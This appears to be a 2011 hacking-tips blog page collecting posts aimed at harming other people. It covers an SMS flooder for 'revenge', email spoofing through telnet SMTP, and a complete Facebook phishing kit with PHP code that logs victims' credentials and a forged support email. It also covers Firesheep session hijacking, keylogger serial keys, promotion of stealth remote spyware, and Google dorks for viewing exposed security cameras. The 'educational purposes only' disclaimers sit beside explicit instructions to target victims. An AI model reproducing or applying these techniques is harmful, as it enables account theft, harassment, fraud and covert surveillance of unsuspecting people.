Subscribe via Email

Sunday, May 8, 2011

send Fake sms Disturb Any mobile Number


 




Q.Whats a SMS FLOODER??

IT SENDS INFINITE SMS TO ANY NUMBER THAT U WANT AS LONG AS U RUN IT.
Q. Whats d use?

U want to take revenge from some1 or just do it on friends no. for fun. domains yahoo

HOW TO USE IT:



FireFOx Users

INSTALL GREASMONKEY (Click Here)
DEN INSTALL THE SCRIPT THAT I GAVE
THEN GO TO TOOLS/GREASEMONKEY/MANAGE USER SCRIPTS/TEMP
THEN CLICK ON EDIT
THEN BROWSE NOTEPAD C/WINDOWS/NOTEPAD
THEN EDIT THE NUMBER
Goto eezysms.com,


it will register the mobile no.
On the popup that appears click on ok.
Sit back and Enjoy!! google adwords

How To Send Anonymous Emails

Most of us are very curious to know a method to send anonymous emails to our friends for fun. But the question is, is it possible to send anonymous emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with the following sender details.
From: Bill Gates <billg@microsoft.com>
The art of sending this kind emails is known as Email Spoofing. In my previous post on How to Send Fake Email I insisted on using your own SMTP server to send anonymous emails. This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo(all major email service providers) blocks the emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has 100% success rate. If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server.
 
What is a Relay Server?
In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.
 
So What’s Next?
Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it.
I have created a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to setup your own Anonymous Email Sender Script
 
1. Goto X10 Hosting  and register a new account.
2. Download my Anonymous Email Sender Script (sendmail.rar).
3. Login to your FreeWebHostingArea Account and click on File Manager.
4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.
5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.
6. Now type the following URL
http://yoursite.x10hosting.com/sendmail.php
NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.
7. Use the script to send Anonymous Emails. Enjoy!!!
Tell me whether it worked or not. Please pass your comments…
WARNING: ALL THE INFORMATION PROVIDED IN THIS POST ARE FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.
 
Most of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain. But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorised access.
Also many of the websites offer you to send fake email from their sites where none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. SMTP server is a simple software program which can be installed on your computer in few seconds. SMTP server allows you to send fake email right from your desktop easily and effectively.
Download QK SMTP server HERE. This is the SMTP server i am using in my tutorial. Once you download and install the server on your comp then you are all set to send fake email successfully.
 
 
PART A: CONFIGURING SMTP SERVER
Once you have installed the QK SMTP server on your comp you must perform the following configuration.
1. Click on “Settings” button on the main screen,the Settings window pops up
2. On Settings window click on “Basic Parameter” tab
3. Set binding IP to “127.0.0.1″
4. Set port to “25″
 
PART B: SENDING FAKE EMAIL (EMAIL FORGING)
1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored
2. Goto command prompt(Start-Accessories-Command prompt)
3. Type exactly as follows
C:\>telnet 127.0.0.1 25
Here 127.0.0.1 is the default IP of every computer.25 is the port number. SO you are connecting to the SMTP server running on your own computer. This step is very importand to send fake email.
NOTE: The IP 127.0.0.1 should not be substituted by any other IP.
Heres the snapshot of what you see after step 3. Click on it to enlarge
4. After typing the telnet command in the command prompt you get entry to the server which displays the following message. The response of a OK SMTP server is given below. Message within Green color is only explanation.
220 Welcome to QK SMTP Server 3
helo hacker (Type helo & any name followed by space)
250 Hello hacker (Server Welcomes You)
mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake email appears to have come from)
250 billg@microsoft.com Address Okay (Server gives a positive response)
rcpt to:admin@gmail.com (Type any valid recipient email address)
250 admin@gmail.com Address Okay (Server gives a positive response)
data (type this command to start input data)
354 Please start mail input
From:Gates <billg@microsoft.com>
To:admin@gmail.com
Date:Sat Jan 5,2008 9:45 PM
Subject:Test to send fake email
You can create as many headers followed by the “:” symbol.
NOTE: HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data
<HERE IS YOUR DATA>End the body of email by pressing [ENTER] .(dot) [ENTER]
250 Mail queued for delivery (Sever indicates that the email is ready for sending)
quit (Type this command to quit from server)
221 Closing connection. Good bye.
Connection to host lost
(You will get the above 2 lines of message after typing “quit” command)
(Your fake email is sent to the recipient)

*****END OF EMAIL FORGING*****
Here’s the screenshot for your convenience
 

How to hack Facbook account password by phishing.

In this tutorial we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password
.
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.

action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with

action= “mail.php”

Now open notepad type following code in it and create mail.php.

Code:


<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Now save it as mail.php and create an empty log.txt file. Now you'll need a free web hosting service that supports PHP. Go to http://www.100best-free-web-space.com/ and select service and plan that suits you. Now in root folder of your website create Facebook_files folder and upload all files in Facebook_files of your hard disk to it. Come back to root folder and upload Facebook.html, mail.php and log.txt in it. Change permission for log.txt that it can be seen by administrator only. Once done make Facebook.html your index page and make site live.

Now sign up with http://www.hoaxmail.co.uk/ it provides spoofed email service. Now create a message from support@facebook.com to your victim.


Sub: Invalid activity on your facebook account

Body:
Dear facebook user (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site>
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. Pleas note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.

Countermeasure:
You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.

Firesheep Makes Facebook Hacking Easy

Recently a new firefox addon Firesheep have been a cause of thousands of email accounts, As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly last 24 hours, With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account

What is Session Hijacking?

In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account

How can a Hacker use Firesheep to Hack a Facebook or any other account?

Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:


Method

1. First of all download "Firesheep" from the above link and use the "openwith" option in the firefox browser


2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep



3. Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly

Firesheep

Hope you liked the post! Pass the comments

How to Trace Any IP Address

ipmapIn my earlier post I had discussed about how to capture the IP address of a remote computer. Once you obtain this IP address it is necessary to trace it back to it’s source. So in this post I will show you how to trace any IP address back to it’s source. In fact tracing an IP address is very simple and easy than we think. There exists many websites through which you can trace any IP address back to it’s source. One of my favorite site is ip2location.com.
Just go to http://www.ip2location.com/demo.aspx and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.
1. Country in which the IP is located
2. Region
3. City
4. Latitude/Longitude
5. Zip Code
6. Time Zone
7. Name of the ISP
8. Internet Speed
9. Weather Station
10. Area Code and
11. Domain name associated with the IP address.
A sample snapshot of the results from ip2location.com is given below
ip2location_results
You can also visually trace route any IP address back to it’s location. For this just visit http://www.yougetsignal.com/tools/visual-tracert/ and enter the IP you want to trace in the dialog box and hit the “Proxy Trace” button. Wait for few seconds and the visual trace route tool displays the path Internet packets traverse to reach a specified destination. Hope this helps. Please pass you comments.






How can your location be traced Via your IP


Ip gives it all
Most people wonder how do websites come to know of your location from IP.Now you too can find out.Forget users you can even sneak up on websites. Just enter IP/URL/mailid and vola all the details of are given.

This has some great tools that will help you. You can enter IP/URL/Domain name and much more.

Above is a pic of what it can do (It gives your location. who is your internet provider, how you are connected to him.
This software costs about 60$. What if you dont want to buy the software you can use the lite version. This give only how the data is sent., how are you connected yo him

What if you dont want to download any thing. then there are some online tools

Samspade.org


net4domain.com


visualware.com and more.

Direct free Download PuTTY

PuTTY is an SSH client port to the Nokia 9200 Communicator series. The current version contains basic SSH protocol support, terminal emulation, and a bare-bones user interface.


PuTTY download
Website http://www.chiark.greenend.org.uk/~sgtatham/putty/
Download Page http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
File size 196 kb
License Freeware
Operating System Windows 2000/XP

Direct free Download Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.
hacking tools

Yersinia download
Website http://www.yersinia.net/
Download Page http://www.yersinia.net/download.htm

Download Advanced Port Scanner


This is small size, very fast and simple for use port scanner . Just type IP Addresses of the computer , that you want to scan and you´ll get detailed descriptions for common ports.
hack

Advanced Port Scanner download
Website http://www.radmin.com/products/utilities/portscanner.php
Download Page http://www.download.com/Advanced-Port-Scanner
File size 426 KB
Operating System Windows 95/98/ME/NT4.0/2000/XP/2003/Vista/2008
License: Free

Ethical Hacking & Information Security Toolkit

Kyrion - Ethical Hacking & Information Security Toolkit | 4.29 GB
Control any PC (like opening the CD-ROM, Viewing the Screen, Controlling Mouse etc.) in London sitting right at your place like Delhi. Get into your Friends Accounts of Gmail, Facebook, Orkut and many more in Fraction of Seconds. All E-Mail accounts are now yours, Send mails from any E-mail account without actually logging into it. Surprised? Don’t be. The Kyrion Ethical Hacking Workshop trains you in every domain related to Cyber Security. However, we do everything – Ethically!!! To be an Ethical Hacker, it is important to think like them!

The focus of the workshop is to teach you how to protect yourself from the menace of hacking. During the workshop, the primary aim is to introduce you to the current popular attacks and explain the techniques to counter them. Don't worry, it would not be a "scriptkiddie" material, it will cover concepts and working of the Attacks. Development of your own tools and scripts will also be covered.

The other focus of the workshop is to enable you to build up future systems. It includes making you aware of the current shortcomings which give rise to bad security systems. As it is a vast topic, we will be giving an overview of what constitutes an 'ideal secure system'. This course would equip students to counter the potential attacks. Also, the aim would be to impart technical know-how of how to make the Internet transactions safe and secure. This would be a founding stone for India to emerge as a Super Power in times to come.

Course Details:
The workshop covers the key concepts of ethical hacking, Trojans, Web Security, Wireless Security and Software Cracking. The course structure is well defined and provides in-depth knowledge on cyber security with addition to live demonstrations. With exceptionally good reviews, Kyrion stands as a highly reputed company in providing Ethical Hacking Workshop Training. To register now and avail early bird discounts

# Concept of Ethical Hacking
# Email Hacking
# Windows Hacking and Security
# Trojans
# Web Server as a Target
# Wireless Hacking
# Software Cracking and Patching
# Mobile Tips & Tricks

Download
http://www.filesonic.com/file/43543783/Kyrion-Ethical.Hacking.part01.rar
http://www.filesonic.com/file/43543841/Kyrion-Ethical.Hacking.part02.rar
http://www.filesonic.com/file/43543797/Kyrion-Ethical.Hacking.part03.rar
http://www.filesonic.com/file/43543835/Kyrion-Ethical.Hacking.part04.rar
http://www.filesonic.com/file/43543861/Kyrion-Ethical.Hacking.part05.rar
http://www.filesonic.com/file/43546291/Kyrion-Ethical.Hacking.part06.rar
http://www.filesonic.com/file/43546333/Kyrion-Ethical.Hacking.part07.rar
http://www.filesonic.com/file/43546317/Kyrion-Ethical.Hacking.part08.rar
http://www.filesonic.com/file/43546081/Kyrion-Ethical.Hacking.part09.rar
http://www.filesonic.com/file/43545795/Kyrion-Ethical.Hacking.part10.rar
or
http://www.fileserve.com/file/UsdRdRj/Kyrion-Ethical.Hacking.part01.rar
http://www.fileserve.com/file/wMBVV89/Kyrion-Ethical.Hacking.part02.rar
http://www.fileserve.com/file/UK2Gmhr/Kyrion-Ethical.Hacking.part03.rar
http://www.fileserve.com/file/FPCGC7X/Kyrion-Ethical.Hacking.part04.rar
http://www.fileserve.com/file/4FcWrZE/Kyrion-Ethical.Hacking.part05.rar
http://www.fileserve.com/file/thnCRxT/Kyrion-Ethical.Hacking.part06.rar 

download Free Elite Keylogger with Serials Keys

 I got 5 serial keys for very useful software called Elite Keylogger, so I decided to share them with you. Elite Keystroke Recorder is the most powerful surveillance keylogger for monitoring and recording every detail of PC and Internet activity everywhere: at home or in the office. Additionally, it’s a totally invisible keystroke recorder! While the demo version might be detected by some antiviruses, all registered clients get the special version of Elite Keylogger which cannot be detected and is daily updated for them.
Serial Keys :
HacksPC1
000HWN-YV1AYQ-EQRRM4-4ATVYN-64KZ8R-H188PG-XKJ0E5-DE9913-499495-520F45-DE343F-04DFD1-157CCB
HacksPC2
000H21-M4GXU5-Z2RFTV-C7JPPE-G83K3C-2EWFAV-MZB9D5-6FE928-61DD4E-16FA4A-6926CE-BC65F1-FC1959
HacksPC3
000GXH-QURWY8-EQ3YMR-TU8MET-QB7YHC-GWUY6C-V0AZD0-13B099-F6C681-EE540C-10A36C-BDDB86-AFE24A
HacksPC4
000K2U-4RC1F9-UHJ9EU-N9QM60-DUY6BK-2F8KC2-DNKQ0E-89F58F-EF8BD3-F19A7F-2DAB1A-D30688-CBD70B
HacksPC5
0000T9-TJM0TM-KFG5W8-A7QC25-8X38XM-X4TZUZ-WTENZK-C7C483-9765D2-AABC3F-FE4406-A7ACB5-909664
keylogger

DOWNLOAD ELITE KEYLOGGER

Hide IP address software

 
Hide your Real IP and surf over IP based service with a fake IP and fake and fake location
With this Software.


Downlaod

Remote password hacking software Download sniperspy


Remote password hacking softwareSniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!

remote password hacking software


remote password hacking software

SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes
remote password spying software

4. Records any Password (Email, Login, Instant Messenger etc.)

5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall

What if i dont have physical acess to victims computer?


remote password hacking software
 No physical access to your remote PC is needed to install the spy software. Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.

This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.

The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.

Why would I need SniperSpy?

Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. If you can't get to your computer and are worried about the Internet safety or habits of those using it, then you NEED SniperSpy.

This high-tech spy software will allow you to see exactly what your teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the company computer(s).

Free Essential Hacking tools

A Hacking tool is a program which helps you in Hacking making it easier for you,Gone are those days when you have to do every thing manually,now a days Hacking tools have made work easier for you,Below i am posting some of Hacking tools essential for every Hacker out there to make the work alot easier,these tools are also actually a Kind of Security tools but it on you how you use them.


Free Essential Hacking tools For every Hacker:


IP Tools:
IP-Tools offers many TCP/IP utilities in one program. This award-winning Free Hacking tool can work under Windows 98/ME, Windows NT 4.0, Windows 2000/XP/2003, Windows Vista and is indispensable for anyone who uses the Internet or Intranet.
It includes the following utilities 
1.Local Info – examines the local host and shows info about processor, memory, Winsock data, etc. 
2.Name Scanner – scans all hostnames within a range of IP addresses
3.Port Scanner – scans network(s) for active TCP based services 
4.Ping Scanner – pings a remote hosts over the network 
5.Telnet – telnet client 
6.HTTP – HTTP client 
7.IP-Monitor – shows network traffic in real time & many more 
8.IP TOOLS has almost all the utilities built into it.So there is no need to use seperate tools for every indivisual process of hacking such as Port scanning,Whois scanning,IP monitor etc.It’s like a hacking tool kit which has all the necessary tools for hacking.
Download IP Tools Here


Cain and Able:
Hack computer
Cain and Abel (sometimes called simply "Cain") is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain and Abel. Cain and Abel is maintained by Massimiliano Montoro.I have made a tutorial on Hack a Computer with Cain and able OR
 Download Cain and Able Here


Brutus ( Password Cracker):
Brutus is a remote online password cracker for windows, good for HTTP,POP3,FTP,SMB,Telnet and lots others.. it's also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 70,000 downloads and over 175,000 visitors to this page. Development continues so new releases will be available in the near future. Brutus was written originally to help me check routers etc. for default and common passwords,I have also made a post on Brute force
Password Cracking explained alternatively you can
 Download Brutus Password Cracker Here


RainbowCrack:
A very nice Hacking tools.Its general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. It cracks hashes with rainbow tables,


Features:
Full time-memory tradeoff tool suites, including rainbow table generation, sort, conversion and lookup
Support rainbow table of any hash algorithm
Support rainbow table of any charset
Support rainbow table in raw file format (.rt) and compact file format (.rtc)
Computation on multi-core processor support
Computation on GPU (via NVIDIA CUDA technology) support
Computation on multi-GPU (via NVIDIA CUDA technology) support
Runs on Windows XP 32-bit, Windows Vista 32-bit and Windows 7 32-bit
Command line and graphics user interface
Download Rainbow Cracker Here


LC5(LophtCrack):
Windows password auditing and recovery application L0phtCrack or LC5 attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and reborn as LC6 in 2009.


Download LC5 here


John the Ripper:
A powerful, flexible, and fast multi-platform password hash cracker John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find Here and
download  john ripper here.

Saturday, May 7, 2011

How to watch Security Cameras on Internet CCtv Camera hacking

There are Some Steps “How to watch Security Cameras on Internet”
1. Open up your web browser.
2. Go to a search engine of your choice (i.e. Google, Yahoo, etc.), and input any of the search queries listed below.
3. After you Google one of these queries, you will see some search results, click on any one of them.
4. Depending on the type of camera that you have access to, you may be able to zoom, pan, and tilt the camera to see what you want to.
5. Do not try to get onto password protected cameras, as this will not go unnoticed if too many attempts are made.


Some Commands to be Remember to Find Live CCTV Cameras .


  • inurl:/view.shtml
  • intitle:”Live View / – AXIS” | inurl:view/view.shtml^
  • inurl:ViewerFrame?Mode=
  • inurl:ViewerFrame?Mode=Refresh
  • inurl:axis-cgi/jpg
  • inurl:view/index.shtml
  • inurl:view/view.shtml
  • liveapplet
  • intitle:liveapplet
  • allintitle:”Network Camera NetworkCamera”
  • intitle:axis intitle:”video server”
  • intitle:liveapplet inurl:LvAppl
  • intitle:”EvoCam” inurl:”webcam.html”
  • intitle:”Live NetSnap Cam-Server feed”
  • intitle:”Live View / – AXIS 206M”
  • intitle:”Live View / – AXIS 206W”
  • intitle:”Live View / – AXIS 210″
  • inurl:indexFrame.shtml Axis
  • intitle:start inurl:cgistart
  • intitle:”WJ-NT104 Main Page”
  • intitle:snc-z20 inurl:home/
  • intitle:snc-cs3 inurl:home/
  • intitle:snc-rz30 inurl:home/
  • intitle:”sony network camera snc-p1″
  • viewnetcam.com
  • intitle:”Toshiba Network Camera” user login
  • intitle:”i-Catcher Console – Web Monitor”

free counters
Twitter Delicious Facebook Digg Stumbleupon Favorites More